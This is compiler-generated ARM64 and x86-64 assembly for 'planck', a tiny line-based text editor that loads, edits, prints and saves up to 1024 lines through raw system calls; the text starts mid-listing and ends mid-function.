LBB8_16 LBB8_19: ldr w8, [sp, #16] stur w8, [x29, #-4] b LBB8_20 LBB8_20: ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function dgets _dgets: ; @dgets .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] str w1, [sp, #12] str w2, [sp, #8] str wzr, [sp, #4] b LBB9_1 LBB9_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #4] ldr w9, [sp, #12] subs w9, w9, #1 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB9_8 b LBB9_2 LBB9_2: ; in Loop: Header=BB9_1 Depth=1 ldr w0, [sp, #8] ldr x8, [sp, #16] ldrsw x9, [sp, #4] add x1, x8, x9 mov x2, #1 bl _read subs x8, x0, #1 cset w8, ge tbnz w8, #0, LBB9_4 b LBB9_3 LBB9_3: stur wzr, [x29, #-4] b LBB9_9 LBB9_4: ; in Loop: Header=BB9_1 Depth=1 ldr x8, [sp, #16] ldrsw x9, [sp, #4] ldrsb w8, [x8, x9] subs w8, w8, #10 cset w8, ne tbnz w8, #0, LBB9_6 b LBB9_5 LBB9_5: b LBB9_8 LBB9_6: ; in Loop: Header=BB9_1 Depth=1 b LBB9_7 LBB9_7: ; in Loop: Header=BB9_1 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB9_1 LBB9_8: ldr x8, [sp, #16] ldrsw x9, [sp, #4] add x8, x8, x9 strb wzr, [x8] ldr x0, [sp, #16] bl _strlen mov x8, x0 stur w8, [x29, #-4] b LBB9_9 LBB9_9: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function write _write: ; @write .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str x1, [sp, #16] str x2, [sp, #8] ldursw x1, [x29, #-4] ldr x2, [sp, #16] ldr x3, [sp, #8] mov x0, #4 mov x5, #0 mov x4, x5 bl __syscall ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "usage: " l_.str.1: ; @.str.1 .asciz " [file]\n" l_.str.2: ; @.str.2 .asciz "planck: error: cannot open " l_.str.3: ; @.str.3 .asciz "\n" l_.str.4: ; @.str.4 .asciz "plank: error: line " l_.str.5: ; @.str.5 .asciz " is longer than 127 characters\n" l_.str.6: ; @.str.6 .asciz "plank: error: " l_.str.7: ; @.str.7 .asciz " is greater than 1024 lines\n" l_.str.8: ; @.str.8 .asciz "planck: error: could not close " l_.str.9: ; @.str.9 .asciz "line: " l_.str.10: ; @.str.10 .asciz "?\n" l_.str.11: ; @.str.11 .asciz "command: " l_.str.12: ; @.str.12 .asciz "planck: error: cannot add line, already at limit\n" l_.str.13: ; @.str.13 .asciz " " l_.str.14: ; @.str.14 .asciz "File: " l_.str.15: ; @.str.15 .asciz "planck: error: could not open " .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $132320, %eax ## imm = 0x204E0 callq ____chkstk_darwin subq %rax, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -132244(%rbp) movl %edi, -132248(%rbp) movq %rsi, -132256(%rbp) movl $0, -132268(%rbp) movl $0, -132284(%rbp) movl $0, -132288(%rbp) cmpl $2, -132248(%rbp) jle LBB0_2 ## %bb.1: leaq L_.str(%rip), %rdi movl $2, %esi callq _dputs movq -132256(%rbp), %rax movq (%rax), %rdi movl $2, %esi callq _dputs leaq L_.str.1(%rip), %rdi movl $2, %esi callq _dputs movl $1, %edi callq __exit LBB0_2: movl $0, -132276(%rbp) LBB0_3: ## =>This Loop Header: Depth=1 ## Child Loop BB0_5 Depth 2 cmpl $1024, -132276(%rbp) ## imm = 0x400 jge LBB0_10 ## %bb.4: ## in Loop: Header=BB0_3 Depth=1 movl $0, -132280(%rbp) LBB0_5: ## Parent Loop BB0_3 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $128, -132280(%rbp) jge LBB0_8 ## %bb.6: ## in Loop: Header=BB0_5 Depth=2 movslq -132276(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132280(%rbp), %rcx movb $0, (%rax,%rcx) ## %bb.7: ## in Loop: Header=BB0_5 Depth=2 movl -132280(%rbp), %eax addl $1, %eax movl %eax, -132280(%rbp) jmp LBB0_5 LBB0_8: ## in Loop: Header=BB0_3 Depth=1 jmp LBB0_9 LBB0_9: ## in Loop: Header=BB0_3 Depth=1 movl -132276(%rbp), %eax addl $1, %eax movl %eax, -132276(%rbp) jmp LBB0_3 LBB0_10: cmpl $2, -132248(%rbp) jne LBB0_29 ## %bb.11: movl $0, -132276(%rbp) LBB0_12: ## =>This Inner Loop Header: Depth=1 movslq -132276(%rbp), %rax movq %rax, -132296(%rbp) ## 8-byte Spill movq -132256(%rbp), %rax movq 8(%rax), %rdi callq _strlen movq %rax, %rcx movq -132296(%rbp), %rax ## 8-byte Reload cmpq %rcx, %rax jae LBB0_15 ## %bb.13: ## in Loop: Header=BB0_12 Depth=1 movq -132256(%rbp), %rax movq 8(%rax), %rax movslq -132276(%rbp), %rcx movb (%rax,%rcx), %cl movslq -132276(%rbp), %rax movb %cl, -132112(%rbp,%rax) ## %bb.14: ## in Loop: Header=BB0_12 Depth=1 movl -132276(%rbp), %eax addl $1, %eax movl %eax, -132276(%rbp) jmp LBB0_12 LBB0_15: movslq -132276(%rbp), %rax movb $0, -132112(%rbp,%rax) movl $1, -132288(%rbp) leaq -132112(%rbp), %rdi xorl %edx, %edx movl %edx, %esi callq _open ## kill: def $eax killed $eax killed $rax movl %eax, -132272(%rbp) cmpl $3, %eax jge LBB0_17 ## %bb.16: leaq L_.str.2(%rip), %rdi movl $2, %esi callq _dputs leaq -132112(%rbp), %rdi movl $2, %esi callq _dputs leaq L_.str.3(%rip), %rdi movl $2, %esi callq _dputs jmp LBB0_30 LBB0_17: jmp LBB0_18 LBB0_18: ## =>This Inner Loop Header: Depth=1 movl -132272(%rbp), %edi leaq -132262(%rbp), %rsi movl $1, %edx callq _read cmpq $0, %rax jle LBB0_26 ## %bb.19: ## in Loop: Header=BB0_18 Depth=1 movb -132262(%rbp), %dl movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132268(%rbp), %rcx movb %dl, (%rax,%rcx) movl -132268(%rbp), %eax addl $1, %eax movl %eax, -132268(%rbp) cmpl $126, %eax jle LBB0_21 ## %bb.20: ## in Loop: Header=BB0_18 Depth=1 leaq L_.str.4(%rip), %rdi movl $2, %esi callq _dputs movl -132284(%rbp), %edi movl $2, %esi callq _dputi leaq L_.str.5(%rip), %rdi movl $2, %esi callq _dputs LBB0_21: ## in Loop: Header=BB0_18 Depth=1 movsbl -132262(%rbp), %eax cmpl $10, %eax jne LBB0_25 ## %bb.22: ## in Loop: Header=BB0_18 Depth=1 movl -132284(%rbp), %eax addl $1, %eax movl %eax, -132284(%rbp) cmpl $1023, %eax ## imm = 0x3FF jle LBB0_24 ## %bb.23: ## in Loop: Header=BB0_18 Depth=1 leaq L_.str.6(%rip), %rdi movl $2, %esi callq _dputs movq -132256(%rbp), %rax movq 8(%rax), %rdi movl $2, %esi callq _dputs leaq L_.str.7(%rip), %rdi movl $2, %esi callq _dputs movl $1, %edi callq __exit LBB0_24: ## in Loop: Header=BB0_18 Depth=1 movl $0, -132268(%rbp) LBB0_25: ## in Loop: Header=BB0_18 Depth=1 jmp LBB0_18 LBB0_26: movl -132272(%rbp), %edi callq _close cmpq $-1, %rax jne LBB0_28 ## %bb.27: leaq L_.str.8(%rip), %rdi movl $2, %esi callq _dputs leaq -132112(%rbp), %rdi movl $2, %esi callq _dputs leaq L_.str.3(%rip), %rdi movl $2, %esi callq _dputs movl $1, %edi callq __exit LBB0_28: jmp LBB0_29 LBB0_29: jmp LBB0_30 LBB0_30: movl -132284(%rbp), %edi movl $1, %esi callq _dputi leaq L_.str.3(%rip), %rdi movl $1, %esi callq _dputs LBB0_31: ## =>This Loop Header: Depth=1 ## Child Loop BB0_121 Depth 2 ## Child Loop BB0_100 Depth 2 ## Child Loop BB0_84 Depth 2 ## Child Loop BB0_87 Depth 3 ## Child Loop BB0_91 Depth 3 ## Child Loop BB0_59 Depth 2 ## Child Loop BB0_63 Depth 2 ## Child Loop BB0_67 Depth 2 ## Child Loop BB0_72 Depth 2 ## Child Loop BB0_76 Depth 2 ## Child Loop BB0_35 Depth 2 ## Child Loop BB0_39 Depth 2 ## Child Loop BB0_41 Depth 3 ## Child Loop BB0_47 Depth 2 leaq L_.str.9(%rip), %rdi movl $1, %esi callq _dputs leaq -132261(%rbp), %rdi movl $5, %esi xorl %edx, %edx callq _dgeti movl %eax, -132284(%rbp) cmpl $1024, %eax ## imm = 0x400 jle LBB0_33 ## %bb.32: ## in Loop: Header=BB0_31 Depth=1 leaq L_.str.10(%rip), %rdi movl $1, %esi callq _dputs jmp LBB0_31 LBB0_33: ## in Loop: Header=BB0_31 Depth=1 leaq L_.str.11(%rip), %rdi movl $1, %esi callq _dputs leaq -132261(%rbp), %rdi movl $5, %esi xorl %edx, %edx callq _dgets movsbl -132261(%rbp), %eax addl $-100, %eax movl %eax, %ecx movq %rcx, -132304(%rbp) ## 8-byte Spill subl $15, %eax ja LBB0_129 ## %bb.134: ## in Loop: Header=BB0_31 Depth=1 movq -132304(%rbp), %rax ## 8-byte Reload leaq LJTI0_0(%rip), %rcx movslq (%rcx,%rax,4), %rax addq %rcx, %rax jmpq *%rax LBB0_34: ## in Loop: Header=BB0_31 Depth=1 movl $0, -132276(%rbp) LBB0_35: ## Parent Loop BB0_31 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $128, -132276(%rbp) jge LBB0_38 ## %bb.36: ## in Loop: Header=BB0_35 Depth=2 movl -132284(%rbp), %eax subl $1, %eax movslq %eax, %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132276(%rbp), %rcx movb $0, (%rax,%rcx) ## %bb.37: ## in Loop: Header=BB0_35 Depth=2 movl -132276(%rbp), %eax addl $1, %eax movl %eax, -132276(%rbp) jmp LBB0_35 LBB0_38: ## in Loop: Header=BB0_31 Depth=1 movl -132284(%rbp), %eax movl %eax, -132276(%rbp) LBB0_39: ## Parent Loop BB0_31 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB0_41 Depth 3 cmpl $1024, -132276(%rbp) ## imm = 0x400 jge LBB0_46 ## %bb.40: ## in Loop: Header=BB0_39 Depth=2 movl $0, -132280(%rbp) LBB0_41: ## Parent Loop BB0_31 Depth=1 ## Parent Loop BB0_39 Depth=2 ## => This Inner Loop Header: Depth=3 cmpl $128, -132280(%rbp) jge LBB0_44 ## %bb.42: ## in Loop: Header=BB0_41 Depth=3 movslq -132276(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132280(%rbp), %rcx movb (%rax,%rcx), %dl movl -132276(%rbp), %eax subl $1, %eax movslq %eax, %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132280(%rbp), %rcx movb %dl, (%rax,%rcx) ## %bb.43: ## in Loop: Header=BB0_41 Depth=3 movl -132280(%rbp), %eax addl $1, %eax movl %eax, -132280(%rbp) jmp LBB0_41 LBB0_44: ## in Loop: Header=BB0_39 Depth=2 jmp LBB0_45 LBB0_45: ## in Loop: Header=BB0_39 Depth=2 movl -132276(%rbp), %eax addl $1, %eax movl %eax, -132276(%rbp) jmp LBB0_39 LBB0_46: ## in Loop: Header=BB0_31 Depth=1 movl $0, -132276(%rbp) LBB0_47: ## Parent Loop BB0_31 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $128, -132276(%rbp) jge LBB0_50 ## %bb.48: ## in Loop: Header=BB0_47 Depth=2 movslq -132276(%rbp), %rax movb $0, -144(%rbp,%rax) ## %bb.49: ## in Loop: Header=BB0_47 Depth=2 movl -132276(%rbp), %eax addl $1, %eax movl %eax, -132276(%rbp) jmp LBB0_47 LBB0_50: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_130 LBB0_51: ## in Loop: Header=BB0_31 Depth=1 cmpl $0, -132284(%rbp) jne LBB0_53 ## %bb.52: ## in Loop: Header=BB0_31 Depth=1 leaq L_.str.10(%rip), %rdi movl $1, %esi callq _dputs jmp LBB0_130 LBB0_53: ## in Loop: Header=BB0_31 Depth=1 movl -132284(%rbp), %eax addl $-1, %eax movl %eax, -132284(%rbp) movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movsbl (%rax), %eax cmpl $0, %eax je LBB0_56 ## %bb.54: ## in Loop: Header=BB0_31 Depth=1 movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movsbl (%rax), %eax cmpl $10, %eax je LBB0_56 ## %bb.55: ## in Loop: Header=BB0_31 Depth=1 movslq -132284(%rbp), %rax leaq -131088(%rbp), %rdi shlq $7, %rax addq %rax, %rdi movl $1, %esi callq _dputs leaq L_.str.3(%rip), %rdi movl $1, %esi callq _dputs LBB0_56: ## in Loop: Header=BB0_31 Depth=1 leaq -132240(%rbp), %rdi movl $127, %esi xorl %edx, %edx callq _dgets cmpl $0, %eax jne LBB0_58 ## %bb.57: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_130 LBB0_58: ## in Loop: Header=BB0_31 Depth=1 movl $0, -132276(%rbp) LBB0_59: ## Parent Loop BB0_31 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $128, -132276(%rbp) jge LBB0_62 ## %bb.60: ## in Loop: Header=BB0_59 Depth=2 movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132276(%rbp), %rcx movb $0, (%rax,%rcx) ## %bb.61: ## in Loop: Header=BB0_59 Depth=2 movl -132276(%rbp), %eax addl $1, %eax movl %eax, -132276(%rbp) jmp LBB0_59 LBB0_62: ## in Loop: Header=BB0_31 Depth=1 movl $0, -132276(%rbp) LBB0_63: ## Parent Loop BB0_31 Depth=1 ## => This Inner Loop Header: Depth=2 movslq -132276(%rbp), %rax movq %rax, -132312(%rbp) ## 8-byte Spill leaq -132240(%rbp), %rdi callq _strlen movq %rax, %rcx movq -132312(%rbp), %rax ## 8-byte Reload cmpq %rcx, %rax jae LBB0_66 ## %bb.64: ## in Loop: Header=BB0_63 Depth=2 movslq -132276(%rbp), %rax movb -132240(%rbp,%rax), %dl movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132276(%rbp), %rcx movb %dl, (%rax,%rcx) ## %bb.65: ## in Loop: Header=BB0_63 Depth=2 movl -132276(%rbp), %eax addl $1, %eax movl %eax, -132276(%rbp) jmp LBB0_63 LBB0_66: ## in Loop: Header=BB0_31 Depth=1 movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132276(%rbp), %rcx movb $10, (%rax,%rcx) movl $0, -132276(%rbp) LBB0_67: ## Parent Loop BB0_31 Depth=1 ## => This Inner Loop Header: Depth=2 movslq -132276(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movsbl (%rax), %eax cmpl $0, %eax je LBB0_70 ## %bb.68: ## in Loop: Header=BB0_67 Depth=2 jmp LBB0_69 LBB0_69: ## in Loop: Header=BB0_67 Depth=2 movl -132276(%rbp), %eax addl $1, %eax movl %eax, -132276(%rbp) jmp LBB0_67 LBB0_70: ## in Loop: Header=BB0_31 Depth=1 movl -132276(%rbp), %eax cmpl -132284(%rbp), %eax jge LBB0_80 ## %bb.71: ## in Loop: Header=BB0_31 Depth=1 movl $0, -132280(%rbp) LBB0_72: ## Parent Loop BB0_31 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $128, -132280(%rbp) jge LBB0_75 ## %bb.73: ## in Loop: Header=BB0_72 Depth=2 movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132280(%rbp), %rcx movb (%rax,%rcx), %dl movslq -132276(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132280(%rbp), %rcx movb %dl, (%rax,%rcx) ## %bb.74: ## in Loop: Header=BB0_72 Depth=2 movl -132280(%rbp), %eax addl $1, %eax movl %eax, -132280(%rbp) jmp LBB0_72 LBB0_75: ## in Loop: Header=BB0_31 Depth=1 movl $0, -132280(%rbp) LBB0_76: ## Parent Loop BB0_31 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $128, -132280(%rbp) jge LBB0_79 ## %bb.77: ## in Loop: Header=BB0_76 Depth=2 movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132280(%rbp), %rcx movb $0, (%rax,%rcx) ## %bb.78: ## in Loop: Header=BB0_76 Depth=2 movl -132280(%rbp), %eax addl $1, %eax movl %eax, -132280(%rbp) jmp LBB0_76 LBB0_79: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_80 LBB0_80: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_130 LBB0_81: ## in Loop: Header=BB0_31 Depth=1 movsbl -144(%rbp), %eax cmpl $0, %eax je LBB0_83 ## %bb.82: ## in Loop: Header=BB0_31 Depth=1 leaq L_.str.12(%rip), %rdi movl $2, %esi callq _dputs jmp LBB0_130 LBB0_83: ## in Loop: Header=BB0_31 Depth=1 movl $1022, -132276(%rbp) ## imm = 0x3FE LBB0_84: ## Parent Loop BB0_31 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB0_87 Depth 3 ## Child Loop BB0_91 Depth 3 movl -132276(%rbp), %eax movl -132284(%rbp), %ecx subl $1, %ecx cmpl %ecx, %eax jle LBB0_97 ## %bb.85: ## in Loop: Header=BB0_84 Depth=2 movslq -132276(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movsbl (%rax), %eax cmpl $0, %eax je LBB0_95 ## %bb.86: ## in Loop: Header=BB0_84 Depth=2 movl $0, -132280(%rbp) LBB0_87: ## Parent Loop BB0_31 Depth=1 ## Parent Loop BB0_84 Depth=2 ## => This Inner Loop Header: Depth=3 cmpl $128, -132280(%rbp) jge LBB0_90 ## %bb.88: ## in Loop: Header=BB0_87 Depth=3 movslq -132276(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132280(%rbp), %rcx movb (%rax,%rcx), %dl movl -132276(%rbp), %eax addl $1, %eax movslq %eax, %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132280(%rbp), %rcx movb %dl, (%rax,%rcx) ## %bb.89: ## in Loop: Header=BB0_87 Depth=3 movl -132280(%rbp), %eax addl $1, %eax movl %eax, -132280(%rbp) jmp LBB0_87 LBB0_90: ## in Loop: Header=BB0_84 Depth=2 movl $0, -132280(%rbp) LBB0_91: ## Parent Loop BB0_31 Depth=1 ## Parent Loop BB0_84 Depth=2 ## => This Inner Loop Header: Depth=3 cmpl $128, -132280(%rbp) jge LBB0_94 ## %bb.92: ## in Loop: Header=BB0_91 Depth=3 movslq -132276(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movslq -132280(%rbp), %rcx movb $0, (%rax,%rcx) ## %bb.93: ## in Loop: Header=BB0_91 Depth=3 movl -132280(%rbp), %eax addl $1, %eax movl %eax, -132280(%rbp) jmp LBB0_91 LBB0_94: ## in Loop: Header=BB0_84 Depth=2 jmp LBB0_95 LBB0_95: ## in Loop: Header=BB0_84 Depth=2 jmp LBB0_96 LBB0_96: ## in Loop: Header=BB0_84 Depth=2 movl -132276(%rbp), %eax addl $-1, %eax movl %eax, -132276(%rbp) jmp LBB0_84 LBB0_97: ## in Loop: Header=BB0_31 Depth=1 movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movb $10, (%rax) jmp LBB0_130 LBB0_98: ## in Loop: Header=BB0_31 Depth=1 cmpl $0, -132284(%rbp) jne LBB0_110 ## %bb.99: ## in Loop: Header=BB0_31 Depth=1 movl $0, -132276(%rbp) LBB0_100: ## Parent Loop BB0_31 Depth=1 ## => This Inner Loop Header: Depth=2 movslq -132276(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movsbl (%rax), %eax cmpl $0, %eax je LBB0_109 ## %bb.101: ## in Loop: Header=BB0_100 Depth=2 cmpl $999, -132276(%rbp) ## imm = 0x3E7 jge LBB0_103 ## %bb.102: ## in Loop: Header=BB0_100 Depth=2 leaq L_.str.13(%rip), %rdi movl $1, %esi callq _dputs LBB0_103: ## in Loop: Header=BB0_100 Depth=2 cmpl $99, -132276(%rbp) jge LBB0_105 ## %bb.104: ## in Loop: Header=BB0_100 Depth=2 leaq L_.str.13(%rip), %rdi movl $1, %esi callq _dputs LBB0_105: ## in Loop: Header=BB0_100 Depth=2 cmpl $9, -132276(%rbp) jge LBB0_107 ## %bb.106: ## in Loop: Header=BB0_100 Depth=2 leaq L_.str.13(%rip), %rdi movl $1, %esi callq _dputs LBB0_107: ## in Loop: Header=BB0_100 Depth=2 movl -132276(%rbp), %edi addl $1, %edi movl $1, %esi callq _dputi leaq L_.str.13(%rip), %rdi movl $1, %esi callq _dputs movslq -132276(%rbp), %rax leaq -131088(%rbp), %rdi shlq $7, %rax addq %rax, %rdi movl $1, %esi callq _dputs ## %bb.108: ## in Loop: Header=BB0_100 Depth=2 movl -132276(%rbp), %eax addl $1, %eax movl %eax, -132276(%rbp) jmp LBB0_100 LBB0_109: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_114 LBB0_110: ## in Loop: Header=BB0_31 Depth=1 movl -132284(%rbp), %eax subl $1, %eax movslq %eax, %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movsbl (%rax), %eax cmpl $0, %eax jne LBB0_112 ## %bb.111: ## in Loop: Header=BB0_31 Depth=1 leaq L_.str.10(%rip), %rdi movl $1, %esi callq _dputs jmp LBB0_113 LBB0_112: ## in Loop: Header=BB0_31 Depth=1 movl -132284(%rbp), %eax subl $1, %eax cltq leaq -131088(%rbp), %rdi shlq $7, %rax addq %rax, %rdi movl $1, %esi callq _dputs LBB0_113: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_114 LBB0_114: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_130 LBB0_115: jmp LBB0_131 LBB0_116: ## in Loop: Header=BB0_31 Depth=1 cmpl $0, -132288(%rbp) jne LBB0_118 ## %bb.117: ## in Loop: Header=BB0_31 Depth=1 leaq L_.str.14(%rip), %rdi movl $1, %esi callq _dputs leaq -132112(%rbp), %rdi movl $1024, %esi ## imm = 0x400 xorl %edx, %edx callq _dgets movl $1, -132288(%rbp) LBB0_118: ## in Loop: Header=BB0_31 Depth=1 leaq -132112(%rbp), %rdi movl $513, %esi ## imm = 0x201 movl $420, %edx ## imm = 0x1A4 callq _open ## kill: def $eax killed $eax killed $rax movl %eax, -132272(%rbp) cmpl $-1, %eax jne LBB0_120 ## %bb.119: ## in Loop: Header=BB0_31 Depth=1 leaq L_.str.15(%rip), %rdi movl $2, %esi callq _dputs leaq -132112(%rbp), %rdi movl $2, %esi callq _dputs leaq L_.str.3(%rip), %rdi movl $2, %esi callq _dputs jmp LBB0_130 LBB0_120: ## in Loop: Header=BB0_31 Depth=1 movl $0, -132284(%rbp) LBB0_121: ## Parent Loop BB0_31 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $1024, -132284(%rbp) ## imm = 0x400 jge LBB0_126 ## %bb.122: ## in Loop: Header=BB0_121 Depth=2 movslq -132284(%rbp), %rcx leaq -131088(%rbp), %rax shlq $7, %rcx addq %rcx, %rax movsbl (%rax), %eax cmpl $0, %eax jne LBB0_124 ## %bb.123: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_126 LBB0_124: ## in Loop: Header=BB0_121 Depth=2 movslq -132284(%rbp), %rax leaq -131088(%rbp), %rdi shlq $7, %rax addq %rax, %rdi movl -132272(%rbp), %esi callq _dputs ## %bb.125: ## in Loop: Header=BB0_121 Depth=2 movl -132284(%rbp), %eax addl $1, %eax movl %eax, -132284(%rbp) jmp LBB0_121 LBB0_126: ## in Loop: Header=BB0_31 Depth=1 movl -132272(%rbp), %edi callq _close cmpq $-1, %rax jne LBB0_128 ## %bb.127: ## in Loop: Header=BB0_31 Depth=1 leaq L_.str.8(%rip), %rdi movl $2, %esi callq _dputs leaq -132112(%rbp), %rdi movl $2, %esi callq _dputs leaq L_.str.3(%rip), %rdi movl $2, %esi callq _dputs movl $1, %edi callq __exit LBB0_128: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_130 LBB0_129: ## in Loop: Header=BB0_31 Depth=1 leaq L_.str.10(%rip), %rdi movl $1, %esi callq _dputs LBB0_130: ## in Loop: Header=BB0_31 Depth=1 jmp LBB0_31 LBB0_131: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_133 ## %bb.132: xorl %eax, %eax addq $132320, %rsp ## imm = 0x204E0 popq %rbp retq LBB0_133: callq ___stack_chk_fail ud2 .cfi_endproc .p2align 2, 0x90 .data_region jt32 .set L0_0_set_34, LBB0_34-LJTI0_0 .set L0_0_set_129, LBB0_129-LJTI0_0 .set L0_0_set_51, LBB0_51-LJTI0_0 .set L0_0_set_81, LBB0_81-LJTI0_0 .set L0_0_set_98, LBB0_98-LJTI0_0 .set L0_0_set_115, LBB0_115-LJTI0_0 .set L0_0_set_116, LBB0_116-LJTI0_0 LJTI0_0: .long L0_0_set_34 .long L0_0_set_129 .long L0_0_set_129 .long L0_0_set_129 .long L0_0_set_129 .long L0_0_set_51 .long L0_0_set_129 .long L0_0_set_129 .long L0_0_set_129 .long L0_0_set_129 .long L0_0_set_81 .long L0_0_set_129 .long L0_0_set_98 .long L0_0_set_115 .long L0_0_set_129 .long L0_0_set_116 .end_data_region ## -- End function .p2align 4, 0x90 ## -- Begin function dputs _dputs: ## @dputs .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl -12(%rbp), %eax movl %eax, -28(%rbp) ## 4-byte Spill movq -8(%rbp), %rax movq %rax, -24(%rbp) ## 8-byte Spill movq -8(%rbp), %rdi callq _strlen movl -28(%rbp), %edi ## 4-byte Reload movq -24(%rbp), %rsi ## 8-byte Reload movq %rax, %rdx callq _write addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function _exit __exit: ## @_exit .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movslq -4(%rbp), %rsi movl $1, %edi xorl %eax, %eax movl %eax, %r9d movq %r9, %rdx movq %r9, %rcx movq %r9, %r8 callq __syscall addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function strlen _strlen: ## @strlen .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq %rax, -16(%rbp) LBB3_1: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rax movsbl (%rax), %eax cmpl $0, %eax je LBB3_3 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movq -16(%rbp), %rax addq $1, %rax movq %rax, -16(%rbp) jmp LBB3_1 LBB3_3: movq -16(%rbp), %rax movq -8(%rbp), %rcx subq %rcx, %rax popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function open _open: ## @open .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl %edx, -16(%rbp) movq -8(%rbp), %rsi movslq -12(%rbp), %rdx movslq -16(%rbp), %rcx movl $5, %edi xorl %eax, %eax movl %eax, %r9d movq %r9, %r8 callq __syscall addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function read _read: ## @read .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, 